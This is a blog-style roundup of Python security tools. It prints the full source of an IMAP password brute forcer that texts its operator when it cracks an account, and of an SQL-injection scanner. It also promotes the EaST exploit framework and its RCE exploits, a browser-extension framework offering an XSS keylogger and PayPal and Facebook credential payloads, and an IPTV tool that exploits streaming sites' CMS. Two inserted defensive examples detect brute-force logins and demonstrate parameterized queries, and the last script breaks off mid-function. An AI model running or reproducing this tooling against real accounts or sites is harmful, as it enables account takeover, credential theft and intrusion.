Channel: Python Script – Security List Network™

Updates iptv – search and brute force illegal iptv server.

Changelog 6/1/2016:
+ iptv_gui.py : removed _dev from name
+ Update requirements.txt
+ add pastebin crawler
+ Update iptv.py

Cli iptv-on-windows

iptv-gui

IPTV is a simple Python script that lets you crawl search engines to find sites that stream illegal TV programs.
The script leverages the fact that many of those sites use the same CMS to build their web application and share the service, and behind a CMS there are always some exploits. We use one simple exploit to grab and crawl each site's URL for our purposes.

How to use:

Clone the repository git clone git@github.com:Pinperepette/IPTV.git
cd into IPTV
run pip install -r requirements.txt in order to get the full dependencies
run python iptv_cli.py
python iptv_gui.py

update
cd IPTV
git pull

Source : https://github.com/Pinperepette | Our Post Before


IMAP-Brute ~ Multi-Threaded IMAP Brute Forcer.

NOTICE : PLEASE USE IT ETHICALLY.

Multi-Threaded IMAP Brute Forcer with the ability to send a text message to you if or when the password is found.

imap-brute

All platforms supported: Windows, Unix/Linux and Mac OS X.

Usage: imapbrute.py [-h] [-eU EUSERNAME] [-eP EPASSWORD] [-eS SMTP] [-n NUMBER] [-u USERNAME] [-Is SERVER] [-f PATH]

Installation:

git clone https://github.com/tylerp96/IMAP-Brute && cd IMAP-Brute
python imapbrute.py -h (prints the help)

imapbrute.py Script:

'Author: Tyler Price'

import imaplib
import sys
import threading
import thread
from Queue import Queue
import time
from termcolor import colored
import os
import smtplib
import time
import argparse

# Usage:  imapbrute.py [-h] [-eU EUSERNAME] [-eP EPASSWORD] [-eS SMTP] [-n NUMBER] [-u USERNAME] [-Is SERVER] [-f PATH]

parser = argparse.ArgumentParser(description = "IMAP Brute Forcer By: Tyler Price")
group = parser.add_argument_group('required arguments')
group.add_argument('-eU', action="store", dest="eUsername", help="Personal Email Username")
group.add_argument('-eP', action="store", dest="ePassword", help= "Personal Email Password")
group.add_argument('-eS', action="store", dest="SMTP", help="Personal Email Server")
group.add_argument('-n', action="store", dest="number", help="Personal Phone number")
group.add_argument('-u', action="store", dest="username", help="Victim Username")
group.add_argument('-Is', action="store", dest="server" , help="IMAP Server Address")
group.add_argument('-f', action="store", dest="path", help="Wordlist Path")

print colored("\nAttention: Enter -n as number@mms.att.net = AT&T number@vtext.com = Verizon number@messaging.sprintpcs.com = Sprint\n", "red")

args = parser.parse_args()

if args == None:

	print parser.print_help()

	sys.exit(0)

eUsername = args.eUsername
ePassword = args.ePassword
SMTP = args.SMTP
number = args.number
username = args.username
server = args.server
path = args.path

Server = server

server = smtplib.SMTP(SMTP, 587)
server.ehlo()
server.starttls()

server.login(eUsername, ePassword)

def SucessMessage(username,password):

	server.sendmail(eUsername, number, username)
	server.sendmail(eUsername, number, '[!] Login Sucessful ' + password)

def crack(username, password):

	lock = threading.RLock()

	try:

		with lock:

			mail = imaplib.IMAP4_SSL(Server)

			mail.login(username, password)

			print colored("[!] Login Sucessful User: %s Password: %s" ,"green") % (username, password)

			print colored("[!] Exiting...", "yellow")

			thread.start_new_thread(SucessMessage, (username, password, ) )

			time.sleep(1)

			os._exit(1)

	except imaplib.IMAP4.error:

		print colored("[+] Login Failed User: %s Password: %s", "red") % (username, password)


def Worker():

	while True:

		password = q.get()

		crack(username, password)

		q.task_done()

filename = open(path, 'r')

q = Queue()

for x in range(1, 20):

	t = threading.Thread(target=Worker, args=())
	t.daemon = True
	t.start()

for x in filename:

	q.put(x)

q.join()

print colored("[!!!] Attack Complete...Password Not Found", "yellow")

server.sendmail(eUsername, number, username)
server.sendmail(eUsername, number, '[!!!] Attack Complete...Password Not Found')
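
From the mail server's side, a run of this tool is a burst of separate IMAP4_SSL connections that each fail authentication for the same mailbox, optionally followed by one that succeeds. As an added defender-side example (not part of the IMAP-Brute post or its code), the following script parses constructed Dovecot-style imap-login log lines and flags that pattern; the log layout, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in Dovecot's imap-login format (assumed layout; real deployments
# differ). Lines 1-5 are a burst of failures against one mailbox from one client, the
# pattern a threaded wordlist run produces; line 6 is a success from the same client right
# after the burst (the case the tool texts its operator about); line 7 is an unrelated typo.
SAMPLE_LOG = """\
Jan 06 10:15:01 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 10:15:01 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 10:15:02 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 10:15:02 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 10:15:03 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 10:15:04 mail dovecot: imap-login: Login: user=<alice>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Jan 06 11:02:30 mail dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<bob>, method=PLAIN, rip=198.51.100.4, lip=192.0.2.10, TLS
"""

# One imap-login outcome line: syslog timestamp, host, outcome, user, remote IP (rip=).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ dovecot: imap-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?\brip=(?P<rip>[0-9a-fA-F.:]+)"
)


def parse_events(log_text):
    """Turn raw lines into (timestamp, user, remote_ip, success) tuples; lines that
    are not imap-login outcomes are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; strptime defaults to 1900, which is fine
        # for the relative comparisons done here
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("user"), m.group("rip"), m.group("outcome") == "Login"))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag (user, remote_ip) pairs with at least `threshold` failed logins inside a
    sliding `window`, and record whether a successful login from the same client
    followed the burst, which is the signature of a guessed password."""
    alerts = {}
    recent_failures = defaultdict(list)
    for ts, user, rip, success in sorted(events):
        key = (user, rip)
        if success:
            if key in alerts:
                alerts[key]["succeeded_after"] = True
            continue
        kept = [t for t in recent_failures[key] if ts - t <= window]
        kept.append(ts)
        recent_failures[key] = kept
        if len(kept) >= threshold:
            alert = alerts.setdefault(key, {"failures": 0, "succeeded_after": False})
            alert["failures"] = max(alert["failures"], len(kept))
    return alerts


if __name__ == "__main__":
    # A hit with succeeded_after=True warrants a password reset and session revocation,
    # not just a block of the source address; rate limiting on the IMAP front end
    # (e.g. auth failure delays) blunts the threaded attack itself.
    for (user, rip), info in detect_bruteforce(parse_events(SAMPLE_LOG)).items():
        print("ALERT user=%s rip=%s failures=%d succeeded_after=%s"
              % (user, rip, info["failures"], info["succeeded_after"]))
```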

Source : https://github.com/tylerp96

EaST – Exploits and Security Tools Framework.

This software is intended for learning and improving skills and knowledge of attacks on information systems, and for conducting audits and proactive protection. The need for a domestic pentest framework (accessible, affordable, high-confidence) is long overdue, so the EaST framework was created for the domestic (and friendly) information-security markets. EaST is a framework that has in its arsenal all the tools needed to exploit a broad range of vulnerabilities, from the web to buffer overflows. Compared with other similar tools, EaST is simple and easy to use; even a novice researcher can master it and begin to develop in the field of information security.

EaST GUI v0.9.5

Main characteristics:
+ Security framework! Software used for information security must enjoy a high level of user confidence. EaST is implemented as open, easily verifiable Python source code, used for all components of the framework and its modules; the relatively small amount of code makes verification by any user simple. No changes to the OS are made during installation.
+ Maximum simplicity. Download the archive and run the main Python script start.py, which handles starting and stopping exploits, messaging and so on. All management is local or remote through a browser.
+ Easy to create and edit. Modules and exploits can be edited and added “on the fly” without restarting. A module body is simple and minimal in size.
+ Cross-platform, with minimal requirements and dependencies. Tested on Windows and Linux; it should work wherever there is Python. The framework contains all its dependencies and “pulls” external libraries itself.
+ Full functionality of a classic pentest framework! Despite its simplicity and lack of clutter, it has in its arsenal all the means needed to exploit a broad range of vulnerabilities, from the web to buffer overflows.
+ Great scope for extension. A server-client architecture, a messaging API and support libraries let third-party developers create their own open-source solutions or participate in the development of EaST.

east-cli

Exploit list:
+ ef_bitdefender_gravityzone_dt.py Directory traversal
+ ef_cogento_datahub_afd.py Arbitrary File Download
+ ef_e_detective_afd.py Arbitrary File Download
+ ef_easyfile_webserver_sbo.py Stack Buffer Overflow
+ ef_fhfs_rce.py Remote Command Execution
+ ef_joomla_gallery_wd_bsqli.py Blind SQL Injection
+ ef_solarwinds_log_and_event_manager_rce.py Remote Command Execution
+ ef_symantec_pcanywhere_host_rce.py Remote Command Execution
+ ef_wincc_miniweb_dos.py Denial of Service
+ ef_winrar_rce.py Remote Command Execution
+ port_scanner.py Tools

Installation and Usage:

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py
then open your favorite Browser for GUI.

Source: https://github.com/C0reL0ader & http://eastfw.com/

Horus is a security framework for pentesting android Apps.

A mobile pentesting framework written in Python.

Latest Change 9/1/2016:
+ Updated requirements
+ Integrated and using androwarn
+ Fixed all androguard issues

TOOLS INCLUDED
+ androguard as the main static analyzer backend
+ androwarn
+ androbugs framework

Example Horus analysis

Installation:
1. Clone the repository (git clone https://github.com/delta24/horus)
2. Install virtualenv (the package name may differ depending on the distro).
3. Set-up a virtualenv, say env by running mkvirtualenv env -p /usr/bin/python2.
4. Activate the virtualenv source env/bin/activate.
5. Install dependencies using pip install -r requirements.txt.
6. Create a DB based on the models, python manage.py createdb.
7. Run the Flask server using python manage.py runserver

Source : https://github.com/delta24

PyScan-Scanner ~ Vulnerability scanner with custom payload.

PyScan is a simple web vulnerability scanner. You can start a scan with the Python script:
– python PyScan.py -u “http://site.com” --all (scan with all payloads)
– python PyScan.py -u “http://site.com/index.php?id=1” -s -p [ID PAYLOAD] (single scan with the given payload ID)
– python PyScan.py --database (scan all links in the database)

Pyscan

requirements:
+ xampp, lamp etc…
+ mysql
+ urllib2
+ BeautifulSoup
+ requests

Installation:

download PyScan-Scanner-master.zip
unzip it
copy into htdocs (xampp/lampp folder)
import database


TODO:
Change database information
$bdd = new PDO('mysql:host=localhost;dbname=pyscan', 'user', 'password');

Update a Python gate
panel_url = "http://localhost/pyscan/"
gate_scraper = "cmd/gate.php"
gate_scanner = "cmd/scan.php"
gate_vuln = "cmd/vuln.php"
gate_payload = "panel/api/payload.php"
gate_database = "panel/api/database.php"

Username: root
password: toor

Download : PyScan-Scanner-master.zip
Source : https://github.com/graniet

doork is an open-source passive vulnerability auditor tool.

doork is an open-source passive vulnerability auditor that automates searching Google for information about a specific website based on dorks. doork can update its own database from the GHDB and use it to find flaws without ever contacting the target endpoint. You can provide your own wordlist and save the output anywhere.

latest version doork v2

requirement:
– Python 2.6 & 2.7
– All OS Support

Usage:

git clone https://github.com/AeonDave/doork doork
pip install beautifulsoup4
pip install requests

python doork.py -h

Update:
cd doork
git pull

Source: https://github.com/AeonDave

iptv v1.2.2 – search and brute force illegal iptv server.

Changelog v1.2.2: Fixed HTTP error 503 by injecting common browser headers.

iptv-v-1-2-2

IPTV is a simple Python script that lets you crawl search engines to find sites that stream illegal TV programs.
The script leverages the fact that many of those sites use the same CMS to build their web application and share the service, and behind a CMS there are always some exploits. We use one simple exploit to grab and crawl each site's URL for our purposes.

Updates IPTV

How to use:

Clone the repository git clone git@github.com:Pinperepette/IPTV.git
cd into IPTV
run pip install -r requirements.txt in order to get the full dependencies
run python iptv_cli.py
python iptv_gui.py

update
cd IPTV
git pull

Source : https://github.com/Pinperepette | Our Post Before

LynxFramework is an extension browser exploitation framework.

LynxFramework is an exploitation tool for web browsers, offering a specialized service in the form of browser-extension development, namely for Google Chrome and soon Firefox. It operates by injecting a script in order to retrieve targeted data.

LynxFramework: has been tested on windows, MaxOSX, Ubuntu, And Kali 2.0

ONLINE PAYLOAD:
+ XSSKeylooger XSS keylogger
+ ForceDownload force file download
+ paytoweb www.paytoweb.com
+ Paypal https://www.paypal.com/signin/
+ Facebook http://facebook.com

usage:

git clone https://github.com/graniet/LynxFramework && cd LynxFramework
python LynxFramework.py
set:payload (what do you want)
then open your chrome browser..

Source: https://github.com/graniet | https://lynxframework.com/


SQLInjectionScanner – SQL Injection Vulnerability Scanner for a given URL.

The Simple SQL Injection Vulnerability Scanner helps to find SQL injection vulnerabilities within a website. It is basic and intended for educational use.

sqlinjectionscanner

Features:
+ Scan a single URL per time
+ Detect SQL injection vulnerabilities within a website with parameters
+ User agent for web requests
+ Easy to use, everything is automated
+ Error handling for http requests
+ Display a short scan report
+ Check if the provided URL is reachable

usage:

git clone https://github.com/rouabas/SQLInjectionScanner && cd SQLInjectionScanner
python sqli_scanner.py

Script:

#!/usr/bin/python

import sys,  re,  urllib,  urllib2,  string
from urllib2 import Request,  urlopen,  URLError,  HTTPError
from urlparse import urlparse

# Define the usage, the first thing a users sees if he/she starts the script without any parameter
def USAGE_PRNT():
    print ""
    print ""
    print "________________________________________________"
    print "Simple SQL Injection Vulnerability Scanner"
    print ""
    print "Version 0.0.1 (January 29th, 2013)"
    print "________________________________________________"
    print ""
    print "[!] Use parameter --help for help!"
    print "[!] Use parameter --about to learn about this software"
    print ""
    print ""
    return
   
# Define the help message
def HELP_PRNT():
    print ""
    print "The Simple SQL Injection Vulnerability Scanner helps"
    print "to find SQL injection vulnerabilities within a"
    print "website. It is basic and intended for educational use"
    print ""
    print "Usage example:"
    print "sqli_scanner.py -u \"http://site.com/test.php?id=x\""
    print ""
    print "Options:"
    print " -u <URL>              (starts the scanner)"
    print " --help                (displays this text)"
    print " --about                (displays this text)"
    print ""
    print "Features:"
    print " - Scan a single URL per time"
    print " - Detect SQL injection vulnerabilities within a website with parameters"
    print " - User agent for web requests"
    print " - Easy to use, everything is automated"
    print " - Error handling for http requests"
    print " - Display a short scan report"
    print " - Check if the provided URL is reachable"
    print ""
    return

# Define the banner which is printed when the tool was started with parameters
def BANNER_PRNT():
    print ""
    print "________________________________________________"
    print "Simple SQL Injection Vulnerability Scanner"
    print "GNU GENERAL PUBLIC LICENSE"
    print "SQL Vulnerability Scanner by Rouabah Basset is"
    print "Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>-"
    print "Everyone is permitted to copy and distribute verbatim copies"
    print "of this license document, but changing it is not allowed"
    print "Use this onlty for educational purposes."
    print "________________________________________________"
    return
#Define about page
def ABOUT_PRNT():
    print ""
    print "Script version Beta"
    return
    
# We test if the url is reachable
def URL_TESTING(Site_URL):
    # Define User-Agent variable
    user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    
    # Adding the User-Agent to the HTTP request
    Get_URL = urllib2.Request(Site_URL)
    Get_URL.add_header("User-Agent",  user_agent)
    
    # Now let's do the HTTP request
    print "[i] Checking if a connection can be established..."
    try:
        http_URL_test = urllib2.urlopen(Get_URL)
    except HTTPError,  e:
        print "[!] The connection couldn't be established."
        print "[!] Error code: ",  e.code
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    except URLError,  e:
        print "[!] The connection couldn't be established."
        print "[!] Reason: ",  e.reason
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    else:
        print "[i] HaHaa XD, Connected to target! URL seems to be valid."
    return

# Scan the provided URL for a SQL injection vulnerability
def URL_SCANNING(Site_URL):
    # I defined some variables needed for detecting MySQL errors in the source code
    SQL_ERR_1 = "You have an error in your SQL syntax"
    SQL_ERR_2 = "supplied argument is not a valid MySQL result resource"
    SQL_ERR_3 = "check the manual that corresponds to your MySQL"
    PARM_EQ = "="
    PARM_SGN_1 = "?"
    PARM_SGN_2 = "&"
    TRIGGER_ERR_1 = "'"
    TRIGGER_ERR_2 = "-1"
    
    # I defined dict which will list all vulnerable parameters
    VULN_PARAM = {}
    
    # I defined the variables needed to craft URLs for exploitation (if there is at least one vulnerability)
    exploit_urls = list()
    
    # I defined User-Agent variable
    user_agent = "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    
    # Adding the User-Agent to the HTTP request (via GET) 
    Get_URL = urllib2.Request(Site_URL)
    Get_URL.add_header("User-Agent",  user_agent)
    
    # Starting the request
    try:
        CALL_HTTP = urllib2.urlopen(Get_URL)
    except HTTPError,  e:
        print "[!] The connection could not be established."
        print "[!] Error code: ",  e.code
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    except URLError,  e:
        print "[!] The connection could not be established."
        print "[!] Reason: ",  e.reason
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)  
    
    # Storing the response (source code of called website)
    FULL_HTML_CODE = CALL_HTTP.read()
    
    # Paring the URL so I can work with it
    PARSED_URL = urlparse(Site_URL)
    print ""
    print "[i] Moving on now."
    print "[i] Server/Domain is:",  PARSED_URL.netloc
    if len(PARSED_URL.path) == 0:
        print "[!] The URL doesn't contain a script :("
    else:
        print "[i] Detected the path to the script :) :",  PARSED_URL.path
    if len(PARSED_URL.query) == 0:
        print "[!] The URL doesn't contain a query string :("
    else:
        print "[i] Detected the URL query string :) :",  PARSED_URL.query
        print ""
    
    # Searching it for MySQL errors
    SRCH_SQL_ERR_1 = re.findall(SQL_ERR_1, FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_1) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    SRCH_SQL_ERR_2 = re.findall(SQL_ERR_2,  FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_2) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    SRCH_SQL_ERR_3 = re.findall(SQL_ERR_3,  FULL_HTML_CODE)
    if len(SRCH_SQL_ERR_3) != 0:
        print "[!] SQL error in the original URL/website found."
        print "[!] There might be problems exploiting this website (if it is vulnerable)."
    
    # Finding all URL parameters
    if PARM_SGN_1 in Site_URL and PARM_EQ in Site_URL:
        print "[i] It seems that the URL contains at least one parameter."
        print "[i] Trying to find also another parameters..."
        
        # It seems that there is at least one parameter in the URL. Trying to find out if there are also others...
        if PARM_SGN_2 in PARSED_URL.query and PARM_EQ in PARSED_URL.query:
            print "[i] Also found at least one other parameter in the URL."
        else:
            print "[i] No other parameters were found."
        
    else:
        print ""
        print "[!] It seems that there is no parameter in the URL."
        print "[!] How the hell am I supposed to find a vulnerability?"
        print "[!] Please provide an URL with a script and query string."
        print "[!] Example: target/index.php?cat=1&article_id=2"
        print "[!] Hint: I can't handle SEO links, so try to find an URL with a query string."
        print "[!] Exiting now!"
        print ""
        print ""
        sys.exit(1)
    
    # Get the parameters
    PARAMS = dict([part.split('=') for part in PARSED_URL[4].split('&')])

    # Count the parameters
    PARAM_CNTR = len(PARAMS)
    
    # Print the parameters and store them in single variables
    print "[i] The following", PARAM_CNTR, "parameter(s) was/were found:"
    print "[i]",  PARAMS
    print "[i] Starting to scan the provided URL(s) for SQL injection vulnerabilities."
    print ""

    # Have a look at each parameter and do some nasty stuff 
    for index, item in enumerate(PARAMS):
        # Now modify the original URL for triggering MySQL errors. Time to start your prayers XD
        print "[i] Probing parameter \"",  item, "\"..."
  
        # We now have to solve the problem that we can not modify tuples in the way we need it here.
        # We therefore copy the content of the query string (of the provided URL) into a new string.
        # The string can be modified as we like it :) Afterwards we only have to put the original URL together again.
        # Python is great! isn't it?
        QUERY_FOR_REPLACE = "".join(PARSED_URL[4:5])
        MODIFIED_QUERY = QUERY_FOR_REPLACE.replace(PARAMS[item],  TRIGGER_ERR_1)

        # Put the URL together again
        TRIGGER_URL_1_P1 = "".join(PARSED_URL[0:1]) + "://" #http
        TRIGGER_URL_1_P2 = "".join(PARSED_URL[1:2])         #www.site.com/test.php
        TRIGGER_URL_1_P3 = "".join(PARSED_URL[2:3])  + "?"  
        TRIGGER_URL_1_P4 = "".join(MODIFIED_QUERY)  
        TRIG_URL_1 = TRIGGER_URL_1_P1 + TRIGGER_URL_1_P2 + TRIGGER_URL_1_P3 + TRIGGER_URL_1_P4

        # Calling the modified URL
        try:
            HTTP_CALL_TRIGGER_1 = urllib2.urlopen(TRIG_URL_1)
        except HTTPError,  e:
            print "[!] The connection could not be established."
            print "[!] Error code: ",  e.code
        except URLError,  e:
            print "[!] The connection could not be established."
            print "[!] Reason: ",  e.reason
    
        # Storing the response (by .read we get all the source code of called website)
        HTML_CALL_TRIGGER_1 = HTTP_CALL_TRIGGER_1.read()

        # Searching the response for MySQL errors
        SRCH_SQL_ERR_TRIGG_1 = re.findall(SQL_ERR_1, HTML_CALL_TRIGGER_1)
        SRCH_SQL_ERR_TRIGG_2 = re.findall(SQL_ERR_2, HTML_CALL_TRIGGER_1)
        SRCH_SQL_ERR_TRIGG_3 = re.findall(SQL_ERR_3, HTML_CALL_TRIGGER_1)
        
        # If the first method was not successfull we simply try the next one
        if len(SRCH_SQL_ERR_TRIGG_1) == 0 and len(SRCH_SQL_ERR_TRIGG_2) == 0 and len(SRCH_SQL_ERR_TRIGG_3) == 0:

            MODIFIED_QUERY = QUERY_FOR_REPLACE.replace(PARAMS[item],  TRIGGER_ERR_2)
            TRIGGER_URL_2_P1 = "".join(PARSED_URL[0:1]) + "://"
            TRIGGER_URL_2_P2 = "".join(PARSED_URL[1:2]) 
            TRIGGER_URL_2_P3 = "".join(PARSED_URL[2:3])  + "?"
            TRIGGER_URL_2_P4 = "".join(MODIFIED_QUERY)  
            TRIG_URL_2 = TRIGGER_URL_2_P1 + TRIGGER_URL_2_P2 + TRIGGER_URL_2_P3 + TRIGGER_URL_2_P4
            try:
                http_request_trigger_2 = urllib2.urlopen(TRIG_URL_2)
            except HTTPError,  e:
                print "[!] The connection could not be established."
                print "[!] Error code: ",  e.code
            except URLError,  e:
                print "[!] The connection could not be established."
                print "[!] Reason: ",  e.reason
            
            # Call the modified URL and look for MySQL errors
            HTML_CALL_TRIGGER_2 = http_request_trigger_2.read()
            SRCH_SQL_ERR_TRIGG_1 = re.findall(SQL_ERR_1, HTML_CALL_TRIGGER_2)
            SRCH_SQL_ERR_TRIGG_2 = re.findall(SQL_ERR_2, HTML_CALL_TRIGGER_2)
            SRCH_SQL_ERR_TRIGG_3 = re.findall(SQL_ERR_3, HTML_CALL_TRIGGER_2)
            
            # When nothing was found show this message
            if len(SRCH_SQL_ERR_TRIGG_1) == 0 and len(SRCH_SQL_ERR_TRIGG_2) == 0 and len(SRCH_SQL_ERR_TRIGG_3) == 0:
                print "[i] The parameter \"",  item,  "\" doesn't seem to be vulnerable."
        
        else:
            # Add the vulnerable parameter to the report variable
            print "[+] Found possible SQL injection vulnerability! Parameter:", item
            VULN_PARAM[index+1] = item
                   
    # Generate a short report
    if len(VULN_PARAM) != 0:
        print ""
        print "[#] Displaying a short report for the provided URL:"
        print "[#] At least one parameter seems to be vulnerable. "
        print VULN_PARAM
        print "[#] (Pattern: param number, param name)"
        
    else:
        print ""
        print "[#] Displaying a short report for the provided URL:"
        print "[#] No SQL injection vulnerabilities found"
        print "Your Website is secure from SQL Injection."

    # And exit
    print ""
    print "[i] That's it. Bye!"
    print ""
    print ""
    sys.exit(1)
    return
    # End of scan_url function
    # Function for finding the amount of columns (column fuzzer)
# Checking if argument was provided
if len(sys.argv) <=1:
    USAGE_PRNT()
    sys.exit(1)
    
for arg in sys.argv:
    # Checking if help was called
    if arg == "--help":
        HELP_PRNT()
        sys.exit(1)
    # Cheking if about was called
    if arg == "--about":
        ABOUT_PRNT()
        sys.exit(1)
    
    # Checking if scanning mode was called
    if arg == "-u":
        Site_URL = sys.argv[2]
        BANNER_PRNT()
        
        # At first we test if we can actually reach the provided URL
        URL_TESTING(Site_URL)
        
        # Now start the main scanning function
        URL_SCANNING(Site_URL)
    
### EOF ###
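
The scanner above substitutes `'` and then `-1` for a parameter value and greps the response for MySQL error strings. As an added example that is not part of the original script, the following reproduces that decision rule against an in-memory SQLite table to show why the `'` probe produces a database error in a query built by string concatenation and why a parameterized query neither errors nor changes meaning; the table, the `lookup_*` functions and the SQLite error markers are constructed for the demo.

```python
import sqlite3

# Error markers from SQLite's parser, the counterpart of the MySQL strings
# (SQL_ERR_1..3) the scanner greps for in the HTTP response.
SQLITE_ERROR_MARKERS = ("syntax error", "unrecognized token", "incomplete input")


def make_db():
    """Constructed in-memory table standing in for the target's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn, article_id):
    """Query text built by concatenation: the untrusted value becomes SQL.
    This is the defect the scanner's probes reveal; a stray quote breaks the
    statement and the database error leaks into the page."""
    sql = "SELECT title FROM articles WHERE id = '" + article_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, article_id):
    """Hardened form: the value is bound as a parameter and is never parsed as SQL,
    so no probe value can change the statement's structure or raise a syntax error."""
    sql = "SELECT title FROM articles WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (article_id,))]


def probe(lookup, conn, value):
    """Run one lookup with a probe value and report what the scanner would see:
    a database error message (likely injectable) or an ordinary result set."""
    try:
        return {"error": False, "rows": lookup(conn, value)}
    except sqlite3.OperationalError as e:
        return {"error": True, "message": str(e)}


def scan_parameter(lookup, conn, probes=("'", "-1")):
    """Same rule as URL_SCANNING above: inject each probe in turn and treat a
    database error in the response as a possible injection point."""
    for value in probes:
        result = probe(lookup, conn, value)
        if result["error"] and any(m in result["message"] for m in SQLITE_ERROR_MARKERS):
            return True
    return False


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print("%-13s normal lookup: %s" % (name, fn(db, "1")))
        print("%-13s probe \"'\":    %s" % (name, probe(fn, db, "'")))
        print("%-13s flagged:       %s" % (name, scan_parameter(fn, db)))
```

The `-1` probe alone produces no error in either form, which is why an error-only scanner like this one misses injection points that fail silently; the parameterized version is the fix regardless of what the scanner reports.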

Source: https://github.com/rouabas

Illinois – Vulnerabilities Scan Script

Illinois is a vulnerability scanning script for a DNS name or IP.
requirements:
+ python 2.7
+ httplib, urllib & HTMLParser

illinois

with optional arguments:
-h, --help, show this help message and exit
-t TARGET, --target TARGET, Target = > DNS or IP.
-p PORT, --port PORT, Service Port
-d DIRETORY, --diretory DIRETORY, Diretory Listening
-v VERVOSE, --vervose VERVOSE, Show all-process runing

Usage:

git clone https://github.com/RedToor/Illinois && cd Illinois
python Illinois.py

Script:

# Illinois Scan Vulnerabilities Script 
# Author  : RedToor 
# Version : 0.0.0.1

print """
	'####'##::::::'##::::::'####'##::: ##:'#######:'####:'######::
	. ##::##:::::::##::::::. ##::###:: ##'##.... ##. ##:'##... ##:
	: ##::##:::::::##::::::: ##::####: ##:##:::: ##: ##::##:::..::
	: ##::##:::::::##::::::: ##::## ## ##:##:::: ##: ##:. ######::
	: ##::##:::::::##::::::: ##::##. ####:##:::: ##: ##::..... ##:
	: ##::##:::::::##::::::: ##::##:. ###:##:::: ##: ##:'##::: ##:
	'####:########:########'####:##::. ##. #######:'####. ######::
	....:........:........:....:..::::..::.......::....::......:::
	[Vulnerabilities Scan Script] By RedToor 
                                                                                            
"""

# timeout request
TimeoutRequest = 10
# Vervose function
Vervose="false" 
# Default Port 
port = 80
# Default Patch
Patch = "/"

from HTMLParser import HTMLParser
import httplib,urllib  
import argparse
import time 

parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help=" Target = > DNS or IP.")
parser.add_argument("-p", "--port", help=" Service Port")
parser.add_argument("-d", "--diretory", help=" Diretory Listening")
parser.add_argument("-v", "--vervose", help=" Show all-process runing")

args = parser.parse_args()
target=args.target
port=args.port
Patch=args.diretory
Vervose=args.vervose

global Diretory , Files 
Diretory = []
Files    = []
ParamArray = ""
LDiretory = ""
LFiles    = ""
FilesArray = ""
LinksArray = ""
HTMLoutput = ""
HTMLoutputHotFiles=""
IMGfiles  = 0
HTMfiles  = 0
Dangerfiles = 0
Directories = 0

if target[:7] == "http://":
	target=target[7:]


def RequestToTarget(Patch):
	try:
		conn = httplib.HTTPConnection(target,port, timeout=TimeoutRequest)
		conn.request("GET", Patch)
		response = conn.getresponse()
		if response.status == 200:
			return response.read()
	except:
		Error="null"

class myhtmlparser(HTMLParser):
    def __init__(self):
        self.reset()
        self.NEWTAGS = []
        self.NEWATTRS = []
        self.HTMLDATA = []
    def handle_starttag(self, tag, attrs):
        self.NEWTAGS.append(tag)
        self.NEWATTRS.append(attrs)
    def handle_data(self, data):
        self.HTMLDATA.append(data)
    def clean(self):
        self.NEWTAGS = []
        self.NEWATTRS = []
        self.HTMLDATA = []


def OutputHTML(DATA, HOTFILES):
	log=open('Report['+target+'].html','w')
	HTML= """
			<html>
			<head>
				<title> Illinois Report </title>
			</head>
			<body>
				<style type="text/css">
				.top      {font-size: 22px; background-color: red; color: #FFFFFF;  text-align: left;}
				a:link      {background-color: #d7d7d7; color: black}
			    a:visited   {background-color: #d7d7d7;}
			    a:hover     {background-color: red;}
			    a:active    {background-color: #d7d7d7;} 
				</style>
				<h1><div class=top> Report ["""+target+"""] - """+time.strftime('%c')+"""</div>
			</body>
	"""
	log.write(HTML)
	log.write("<table>"+DATA+"</table>")
	log.write("<h2> Hot Files </2><table>"+HOTFILES+"</table>")
	log.close()

def ParsingToSource(Patch):
